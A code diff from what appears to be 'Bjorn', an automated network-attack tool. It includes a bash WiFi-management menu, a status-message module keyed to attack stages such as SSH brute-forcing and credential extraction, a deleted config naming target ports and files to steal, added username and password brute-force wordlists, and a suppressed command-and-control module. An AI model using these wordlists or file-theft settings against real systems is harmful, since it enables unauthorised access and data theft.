echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# List available backups
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
# With no matches the glob stays unexpanded, so also check the first entry exists
if [ ${#backups[@]} -eq 0 ] || [ ! -e "${backups[0]}" ]; then
    log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Verify that the backup file exists
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

c2_manager.py (new file, 1351 lines)
File diff suppressed because it is too large.

@@ -1,71 +1,346 @@
# comment.py
# Comments manager with database backend
# Provides contextual messages for display with timing control and multilingual support.
#   comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
# with a DB text such as: "Trying {user}@{ip} over SSH..."

import os
import time
import random
import locale
from typing import Optional, List, Dict, Any

from init_shared import shared_data
from logger import Logger

logger = Logger(name="comment.py", level=20)  # INFO
# --- Helpers -----------------------------------------------------------------
class _SafeDict(dict):
"""Safe formatter: leaves unknown {placeholders} intact instead of raising."""
def __missing__(self, key):
return "{" + key + "}"
def _row_get(row: Any, key: str, default=None):
"""Safe accessor for rows that may be dict-like or sqlite3.Row."""
try:
return row.get(key, default)
except Exception:
try:
return row[key]
except Exception:
return default
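As a quick illustration of the two helpers above, here is a standalone re-implementation (names `SafeDict`/`row_get` are local to this sketch): unknown placeholders survive formatting, and `row_get` absorbs the fact that `sqlite3.Row` has no `.get()`.

```python
import sqlite3

class SafeDict(dict):
    """Leave unknown {placeholders} intact instead of raising KeyError."""
    def __missing__(self, key):
        return "{" + key + "}"

def row_get(row, key, default=None):
    """Read a field from a dict-like or sqlite3.Row object."""
    try:
        return row.get(key, default)
    except Exception:
        try:
            return row[key]
        except Exception:
            return default

msg = "Trying {user}@{ip} over {proto}...".format_map(
    SafeDict(user="pi", ip="192.168.0.12"))
# {proto} has no value, so it survives unformatted instead of raising

# sqlite3.Row has no .get(), which is exactly the case row_get papers over
conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row
row = conn.execute("SELECT 'hello' AS text, 2 AS weight").fetchone()
```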
# --- Main class --------------------------------------------------------------
class CommentAI:
"""
AI-style comment generator for status messages with:
- Randomized delay between messages
- Database-backed phrases (text, status, theme, lang, weight)
- Multilingual search with language priority and fallbacks
- Safe string templates: "Trying {user}@{ip}..."
"""
    def __init__(self):
        self.shared_data = shared_data

        # Timing configuration with robust defaults
        self.delay_min = max(1, int(getattr(self.shared_data, "comment_delaymin", 5)))
        self.delay_max = max(self.delay_min, int(getattr(self.shared_data, "comment_delaymax", 15)))
        self.comment_delay = self._new_delay()

        # State tracking
        self.last_comment_time: float = 0.0
        self.last_status: Optional[str] = None

        # Ensure comments are loaded in database
        self._ensure_comments_loaded()

        # Initialize first comment for UI using language priority
        if not hasattr(self.shared_data, "bjorn_says") or not getattr(self.shared_data, "bjorn_says"):
            first = self._pick_text("IDLE", lang=None, params=None)
            self.shared_data.bjorn_says = first or "Initializing..."
# --- Language priority & JSON discovery ----------------------------------
def _lang_priority(self, preferred: Optional[str] = None) -> List[str]:
"""
Build ordered language preference list, deduplicated.
Priority sources:
1. explicit `preferred`
2. shared_data.lang_priority (list)
3. shared_data.lang (single fallback)
4. defaults ["en", "fr"]
"""
order: List[str] = []
def norm(x: Optional[str]) -> Optional[str]:
if not x:
return None
x = str(x).strip().lower()
return x[:2] if x else None
# 1) explicit override
p = norm(preferred)
if p:
order.append(p)
sd = self.shared_data
# 2) list from shared_data
if hasattr(sd, "lang_priority") and isinstance(sd.lang_priority, (list, tuple)):
order += [l for l in (norm(x) for x in sd.lang_priority) if l]
# 3) single language from shared_data
if hasattr(sd, "lang"):
l = norm(sd.lang)
if l:
order.append(l)
# 4) fallback defaults
order += ["en", "fr"]
# Deduplicate while preserving order
seen, res = set(), []
for l in order:
if l and l not in seen:
seen.add(l)
res.append(l)
return res
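The priority construction above boils down to "normalize to two-letter codes, keep first occurrence"; a standalone sketch of the same cascade (parameter names here are illustrative, not the class API):

```python
def lang_priority(preferred=None, configured=(), single=None, defaults=("en", "fr")):
    """Normalize inputs to two-letter codes and deduplicate, keeping order."""
    def norm(x):
        x = str(x or "").strip().lower()
        return x[:2] or None

    candidates = ([norm(preferred)]
                  + [norm(c) for c in configured]
                  + [norm(single)]
                  + [norm(d) for d in defaults])
    seen, out = set(), []
    for code in candidates:
        if code and code not in seen:
            seen.add(code)
            out.append(code)
    return out

print(lang_priority("FR-fr", ["en", "de"], "it"))  # -> ['fr', 'en', 'de', 'it']
```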
def _get_comments_json_paths(self, lang: Optional[str] = None) -> List[str]:
"""
Return candidate JSON paths, restricted to default_comments_dir (and explicit comments_file).
Supported patterns:
- {comments_file} (explicit)
- {default_comments_dir}/comments.json
- {default_comments_dir}/comments.<lang>.json
- {default_comments_dir}/{lang}/comments.json
"""
lang = (lang or "").strip().lower()
candidates = []
# 1) Explicit path from shared_data
comments_file = getattr(self.shared_data, "comments_file", "") or ""
if comments_file:
candidates.append(comments_file)
# 2) Default comments directory
default_dir = getattr(self.shared_data, "default_comments_dir", "")
if default_dir:
candidates += [
os.path.join(default_dir, "comments.json"),
os.path.join(default_dir, f"comments.{lang}.json") if lang else "",
os.path.join(default_dir, lang, "comments.json") if lang else "",
]
# Deduplicate
unique_paths, seen = [], set()
for p in candidates:
p = (p or "").strip()
if p and p not in seen:
seen.add(p)
unique_paths.append(p)
return unique_paths
# --- Bootstrapping DB -----------------------------------------------------
    def _ensure_comments_loaded(self):
        """Ensure comments are present in DB; import JSON if empty."""
        try:
            comment_count = int(self.shared_data.db.count_comments())
        except Exception as e:
            logger.error(f"Database error counting comments: {e}")
            comment_count = 0

        if comment_count > 0:
            logger.debug(f"Comments already in database: {comment_count}")
            return

        imported = 0
        for lang in self._lang_priority():
            for json_path in self._get_comments_json_paths(lang):
                if os.path.exists(json_path):
                    try:
                        count = int(self.shared_data.db.import_comments_from_json(json_path))
                        imported += count
                        if count > 0:
                            logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
                            break  # stop at first successful import
                    except Exception as e:
                        logger.error(f"Failed to import comments from {json_path}: {e}")
            if imported > 0:
                break

        if imported == 0:
            logger.debug("No comments imported, seeding minimal fallback set")
            self._seed_minimal_comments()
def _seed_minimal_comments(self):
"""
Seed minimal set when no JSON available.
Schema per row: (text, status, theme, lang, weight)
"""
default_comments = [
# English
("Scanning network for targets...", "NetworkScanner", "NetworkScanner", "en", 2),
("System idle, awaiting commands.", "IDLE", "IDLE", "en", 3),
("Analyzing network topology...", "NetworkScanner", "NetworkScanner", "en", 1),
("Processing authentication attempts...", "SSHBruteforce", "SSHBruteforce", "en", 2),
("Searching for vulnerabilities...", "NmapVulnScanner", "NmapVulnScanner", "en", 2),
("Extracting credentials from services...", "CredExtractor", "CredExtractor", "en", 1),
("Monitoring network changes...", "IDLE", "IDLE", "en", 2),
("Ready for deployment.", "IDLE", "IDLE", "en", 1),
("Target acquisition in progress...", "NetworkScanner", "NetworkScanner", "en", 1),
("Establishing secure connections...", "SSHBruteforce", "SSHBruteforce", "en", 1),
# French (bonus minimal)
("Analyse du réseau en cours...", "NetworkScanner", "NetworkScanner", "fr", 2),
("Système au repos, en attente dordres.", "IDLE", "IDLE", "fr", 3),
("Cartographie de la topologie réseau...", "NetworkScanner", "NetworkScanner", "fr", 1),
("Tentatives dauthentification en cours...", "SSHBruteforce", "SSHBruteforce", "fr", 2),
("Recherche de vulnérabilités...", "NmapVulnScanner", "NmapVulnScanner", "fr", 2),
("Extraction didentifiants depuis les services...", "CredExtractor", "CredExtractor", "fr", 1),
]
try:
self.shared_data.db.insert_comments(default_comments)
logger.info(f"Seeded {len(default_comments)} minimal comments into database")
except Exception as e:
logger.error(f"Failed to seed minimal comments: {e}")
# --- Core selection -------------------------------------------------------
def _new_delay(self) -> int:
"""Generate new random delay between comments."""
delay = random.randint(self.delay_min, self.delay_max)
logger.debug(f"Next comment delay: {delay}s")
return delay
def _pick_text(
self,
status: str,
lang: Optional[str],
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Pick a weighted comment across language preference; supports {templates}.
Selection cascade (per language in priority order):
1) (lang, status)
2) (lang, 'ANY')
3) (lang, 'IDLE')
Then cross-language:
4) (any, status)
5) (any, 'IDLE')
"""
status = status or "IDLE"
langs = self._lang_priority(preferred=lang)
# Language-scoped queries
rows = []
queries = [
("SELECT text, weight FROM comments WHERE lang=? AND status=?", lambda L: (L, status)),
("SELECT text, weight FROM comments WHERE lang=? AND status='ANY'", lambda L: (L,)),
("SELECT text, weight FROM comments WHERE lang=? AND status='IDLE'", lambda L: (L,)),
]
for L in langs:
for sql, args_fn in queries:
try:
rows = self.shared_data.db.query(sql, args_fn(L))
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if rows:
break
# Cross-language fallbacks
if not rows:
for sql, args in [
("SELECT text, weight FROM comments WHERE status=? ORDER BY RANDOM() LIMIT 50", (status,)),
("SELECT text, weight FROM comments WHERE status='IDLE' ORDER BY RANDOM() LIMIT 50", ()),
]:
try:
rows = self.shared_data.db.query(sql, args)
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if not rows:
return None
# Weighted selection using random.choices (no temporary list expansion)
texts: List[str] = []
weights: List[int] = []
for row in rows:
text = _row_get(row, "text", "")
if text:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
texts.append(text)
weights.append(max(1, w))
if texts:
chosen = random.choices(texts, weights=weights, k=1)[0]
else:
chosen = _row_get(rows[0], "text", None)
# Templates {var}
if chosen and params:
try:
chosen = str(chosen).format_map(_SafeDict(params))
except Exception:
# Keep the raw text if formatting fails
pass
return chosen
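The weighted draw in `_pick_text` relies on `random.choices`; a minimal standalone sketch with fabricated rows standing in for DB results:

```python
import random

# Fabricated rows standing in for DB query results (text, weight)
rows = [
    {"text": "System idle, awaiting commands.", "weight": 3},
    {"text": "Monitoring network changes...", "weight": 2},
    {"text": "Ready for deployment.", "weight": 1},
]
texts = [r["text"] for r in rows]
weights = [max(1, int(r.get("weight", 1) or 1)) for r in rows]

random.seed(42)  # deterministic for the demo
picks = random.choices(texts, weights=weights, k=6000)
# With weights 3:2:1 the draw frequencies follow roughly the same 3:2:1 ratio
```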
# --- Public API -----------------------------------------------------------
def get_comment(
self,
status: str,
lang: Optional[str] = None,
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Return a comment if status changed or delay expired.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
params: optional dict to format templates with {placeholders}.
Returns:
str or None: A new comment, or None if not time yet and status unchanged.
"""
current_time = time.time()
status = status or "IDLE"
status_changed = (status != self.last_status)
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
text = self._pick_text(status, lang, params)
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
return text
return None
# Backward compatibility alias
Commentaireia = CommentAI
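The throttling in `get_comment` (emit on status change, or once a randomized delay has elapsed) can be sketched without the database by injecting a fake clock; this is a simplified model, not the class itself:

```python
import random

class CommentThrottle:
    """Emit only when status changes or the random delay has elapsed."""
    def __init__(self, delay_min=5, delay_max=15, clock=None):
        self.delay_min, self.delay_max = delay_min, max(delay_min, delay_max)
        self.clock = clock or (lambda: 0.0)
        self.last_time = 0.0
        self.last_status = None
        self.delay = random.randint(self.delay_min, self.delay_max)

    def should_emit(self, status):
        now = self.clock()
        if status != self.last_status or now - self.last_time >= self.delay:
            self.last_status = status
            self.last_time = now
            self.delay = random.randint(self.delay_min, self.delay_max)
            return True
        return False

# Fake clock for demonstration
t = {"now": 0.0}
th = CommentThrottle(delay_min=5, delay_max=5, clock=lambda: t["now"])
assert th.should_emit("IDLE")            # first call: status change
assert not th.should_emit("IDLE")        # too soon, same status
t["now"] = 10.0
assert th.should_emit("IDLE")            # delay (5 s) elapsed
assert th.should_emit("NetworkScanner")  # immediate on status change
```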


@@ -1,107 +0,0 @@
{
"__title_Bjorn__": "Settings",
"manual_mode": false,
"websrv": true,
"web_increment ": false,
"debug_mode": true,
"scan_vuln_running": false,
"retry_success_actions": false,
"retry_failed_actions": true,
"blacklistcheck": true,
"displaying_csv": true,
"log_debug": true,
"log_info": true,
"log_warning": true,
"log_error": true,
"log_critical": true,
"startup_delay": 10,
"web_delay": 2,
"screen_delay": 1,
"comment_delaymin": 15,
"comment_delaymax": 30,
"livestatus_delay": 8,
"image_display_delaymin": 2,
"image_display_delaymax": 8,
"scan_interval": 180,
"scan_vuln_interval": 900,
"failed_retry_delay": 600,
"success_retry_delay": 900,
"ref_width": 122,
"ref_height": 250,
"epd_type": "epd2in13_V4",
"__title_lists__": "List Settings",
"portlist": [
20,
21,
22,
23,
25,
53,
69,
80,
110,
111,
135,
137,
139,
143,
161,
162,
389,
443,
445,
512,
513,
514,
587,
636,
993,
995,
1080,
1433,
1521,
2049,
3306,
3389,
5000,
5001,
5432,
5900,
8080,
8443,
9090,
10000
],
"mac_scan_blacklist": [
"00:11:32:c4:71:9b",
"00:11:32:c4:71:9a"
],
"ip_scan_blacklist": [
"192.168.1.1",
"192.168.1.12",
"192.168.1.38",
"192.168.1.53",
"192.168.1.40",
"192.168.1.29"
],
"steal_file_names": [
"ssh.csv",
"hack.txt"
],
"steal_file_extensions": [
".bjorn",
".hack",
".flag"
],
"__title_network__": "Network",
"nmap_scan_aggressivity": "-T2",
"portstart": 1,
"portend": 2,
"__title_timewaits__": "Time Wait Settings",
"timewait_smb": 0,
"timewait_ssh": 0,
"timewait_telnet": 0,
"timewait_ftp": 0,
"timewait_sql": 0,
"timewait_rdp": 0
}


@@ -1,3 +1,16 @@
root
admin
bjorn
MqUG09FmPb
OD1THT4mKMnlt2M$
letmein
QZKOJDBEJf
ZrXqzIlZk3
9XP5jT3gwJjmvULK
password
9Pbc8RjB5s
fcQRQUxnZl
Jzp0G7kolyloIk7g
DyMuqqfGYj
G8tCoDFNIM
8gv1j!vubL20xCH$
i5z1nlF3Uf
zkg3ojoCoKAHaPo%
oWcK1Zmkve


@@ -1,3 +1,8 @@
manager
root
admin
bjorn
db_audit
dev
user
boss
deploy

Some files were not shown because too many files have changed in this diff.